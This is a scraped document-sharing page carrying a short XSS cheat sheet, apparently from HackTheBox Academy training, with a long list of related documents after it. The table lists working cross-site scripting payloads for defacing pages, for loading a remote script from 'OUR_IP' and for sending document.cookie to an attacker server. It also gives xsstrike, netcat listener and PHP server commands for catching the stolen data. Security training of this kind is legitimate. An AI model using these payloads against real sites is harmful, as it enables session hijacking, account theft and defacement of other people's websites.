Xss Cheatsheet

This document contains a table with XSS payload codes that can be used to alter aspects of a website like changing the background color or title. It also includes commands for running the XSS tool xsstrike on a URL parameter and starting netcat and PHP servers to receive data from successful payloads.

Uploaded by

Anonymous (Akcent Hoong)

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

137 views

Xss Cheatsheet

Uploaded by

Anonymous (Akcent Hoong)

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

You are on page 1/ 1

## Commands

| Code | Description |
| ----- | ----- |
| **XSS Payloads** |
| `<script>alert(window.origin)</script>` | Basic XSS Payload |
| `<plaintext>` | Basic XSS Payload |
| `<script>print()</script>` | Basic XSS Payload |
| `<img src="" onerror=alert(window.origin)>` | HTML-based XSS Payload |
| `<script>document.body.style.background = "#141d2b"</script>` | Change Background
Color |
| `<script>document.body.background = "https://www.hackthebox.eu/images/logo-
htb.svg"</script>` | Change Background Image |
| `<script>document.title = 'HackTheBox Academy'</script>` | Change Website Title |
| `<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>` |
Overwrite website's main body |
| `<script>document.getElementById('urlform').remove();</script>` | Remove certain
HTML element |
| `<script src="http://OUR_IP/script.js"></script>` | Load remote script |
| `<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>` |
Send Cookie details to us |
| **Commands** |
| `python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"` | Run
`xsstrike` on a url parameter |
| `sudo nc -lvnp 80` | Start `netcat` listener |
| `sudo php -S 0.0.0.0:80 ` | Start `PHP` server |

Cat Hackthebox Writeup
100% (1)
Cat Hackthebox Writeup
17 pages
Course Presentation
No ratings yet
Course Presentation
43 pages
JavaScript For Hackers
0% (1)
JavaScript For Hackers
51 pages
Hacking Guide
No ratings yet
Hacking Guide
13 pages
Cross Site Scripting Xss Module Cheat Sheet
No ratings yet
Cross Site Scripting Xss Module Cheat Sheet
2 pages
Sea
No ratings yet
Sea
10 pages
Lecture12A-ReflectedXSS-XSSdefence
No ratings yet
Lecture12A-ReflectedXSS-XSSdefence
42 pages
Tutorial Guide: SSTF 2022 Hacker's Playground
100% (1)
Tutorial Guide: SSTF 2022 Hacker's Playground
28 pages
Reflected+XSS+-+Manual+Attacks
No ratings yet
Reflected+XSS+-+Manual+Attacks
5 pages
By Hari Ruthala
No ratings yet
By Hari Ruthala
37 pages
kggd6n5v
No ratings yet
kggd6n5v
1 page
10 Practical scenarios for XSS attacks
No ratings yet
10 Practical scenarios for XSS attacks
21 pages
Reflected+XSS+-+Automated+Attacks
No ratings yet
Reflected+XSS+-+Automated+Attacks
7 pages
Complete Cross-Site Scripting Walkthrough
No ratings yet
Complete Cross-Site Scripting Walkthrough
23 pages
Complete Cross Site Scripting Walkthrough
No ratings yet
Complete Cross Site Scripting Walkthrough
23 pages
Cross-Domain Security in Web Applications: Hapter
No ratings yet
Cross-Domain Security in Web Applications: Hapter
83 pages
Hack Back
No ratings yet
Hack Back
46 pages
Advanced Web Hacking PDF
100% (1)
Advanced Web Hacking PDF
21 pages
MIT6 858F14 Lec9 PDF
No ratings yet
MIT6 858F14 Lec9 PDF
11 pages
The Write Direction: The Ultimate Guide to Writing your Memoir
From Everand
The Write Direction: The Ultimate Guide to Writing your Memoir
Rodney Walker
No ratings yet
XSS_Payload_Examples
No ratings yet
XSS_Payload_Examples
7 pages
Bankrobber
No ratings yet
Bankrobber
17 pages
React Portfolio App Development: Increase your online presence and create your personal brand
From Everand
React Portfolio App Development: Increase your online presence and create your personal brand
Abdelfattah Ragab
No ratings yet
Quick
No ratings yet
Quick
21 pages
Report of XSS-1
No ratings yet
Report of XSS-1
8 pages
SSRF & Cross-Site Scripting. Task 1 What Is An SSRF - by YCZHU - Medium
No ratings yet
SSRF & Cross-Site Scripting. Task 1 What Is An SSRF - by YCZHU - Medium
1 page
Headless
No ratings yet
Headless
15 pages
Cross-Site Scripting (XSS) Cheat Sheet: Event Handlers That Do Not Require User Interaction
No ratings yet
Cross-Site Scripting (XSS) Cheat Sheet: Event Handlers That Do Not Require User Interaction
29 pages
You and Me Dancing to Gershwin
From Everand
You and Me Dancing to Gershwin
Christine Miles
No ratings yet
serie11
No ratings yet
serie11
3 pages
Poems For The Weeping Kind
From Everand
Poems For The Weeping Kind
Althea Davis
No ratings yet
Wrestleville: The Pro Wrestling Vault - Volume 2
From Everand
Wrestleville: The Pro Wrestling Vault - Volume 2
Vinny Berry
No ratings yet
Alert
No ratings yet
Alert
7 pages
Diss
No ratings yet
Diss
202 pages
Cross-Site Scripting (XSS) Cheat Sheet: Event Handlers That Do Not Require User Interaction
No ratings yet
Cross-Site Scripting (XSS) Cheat Sheet: Event Handlers That Do Not Require User Interaction
20 pages
Phrasures Guide
No ratings yet
Phrasures Guide
5 pages
Cross Fit
No ratings yet
Cross Fit
39 pages
BUG BOUNTY
No ratings yet
BUG BOUNTY
1 page
XSS
No ratings yet
XSS
2 pages
Xss White Paper
No ratings yet
Xss White Paper
8 pages
HackBashxAYCEP 2024 Web Hacking Fundamentals
100% (1)
HackBashxAYCEP 2024 Web Hacking Fundamentals
55 pages
HackTheBox Corporate Insane Machine Walkthrough
No ratings yet
HackTheBox Corporate Insane Machine Walkthrough
38 pages
Cross Site Scripting
No ratings yet
Cross Site Scripting
8 pages
Cross Site Scripting XSS
No ratings yet
Cross Site Scripting XSS
31 pages
Poets
From Everand
Poets
Jose Trejo Maya
No ratings yet
Formula x
No ratings yet
Formula x
27 pages
XSS - Web For Pentester
No ratings yet
XSS - Web For Pentester
22 pages
Using XSS To Bypass CSRF Protection
No ratings yet
Using XSS To Bypass CSRF Protection
12 pages
Ch 006
No ratings yet
Ch 006
32 pages
XSS Payloads
No ratings yet
XSS Payloads
21 pages
Bug_bounty_tips_And_tricks_ _1732549632 (1)
No ratings yet
Bug_bounty_tips_And_tricks_ _1732549632 (1)
22 pages
Automated XSS
No ratings yet
Automated XSS
2 pages
JavaScript For Hackers 2
100% (1)
JavaScript For Hackers 2
31 pages
OWASP LA The Last XSS Defense Talk Jim Manico 2018 08
No ratings yet
OWASP LA The Last XSS Defense Talk Jim Manico 2018 08
75 pages
Readme
No ratings yet
Readme
4 pages
Cross-Site Scripting (XSS) Cheat Sheet: Event Handlers That Do Not Require User Interaction
No ratings yet
Cross-Site Scripting (XSS) Cheat Sheet: Event Handlers That Do Not Require User Interaction
21 pages
Cross-Site Scripting: Analysis, Identification and Exploitation
No ratings yet
Cross-Site Scripting: Analysis, Identification and Exploitation
28 pages
Cross Site Scripting (XSS)
50% (2)
Cross Site Scripting (XSS)
6 pages
Understanding Basic Vuln C0de For RCE (Remote Command's Execution)
No ratings yet
Understanding Basic Vuln C0de For RCE (Remote Command's Execution)
9 pages
Poetic Insights
From Everand
Poetic Insights
Laura Buck
No ratings yet
Sqlmap Cheatsheet
No ratings yet
Sqlmap Cheatsheet
2 pages
Wireshark Tcpdump Cheatsheeet
No ratings yet
Wireshark Tcpdump Cheatsheeet
4 pages
Command Injection Cheatsheet
No ratings yet
Command Injection Cheatsheet
2 pages
SQL Injection Cheetsheet
No ratings yet
SQL Injection Cheetsheet
2 pages
Ffuf Cheatsheet
No ratings yet
Ffuf Cheatsheet
1 page
MSF Cheatsheet
No ratings yet
MSF Cheatsheet
3 pages
Nmap Cheatsheet
No ratings yet
Nmap Cheatsheet
2 pages

Xss Cheatsheet

Uploaded by

Xss Cheatsheet

Uploaded by

## Commands

You might also like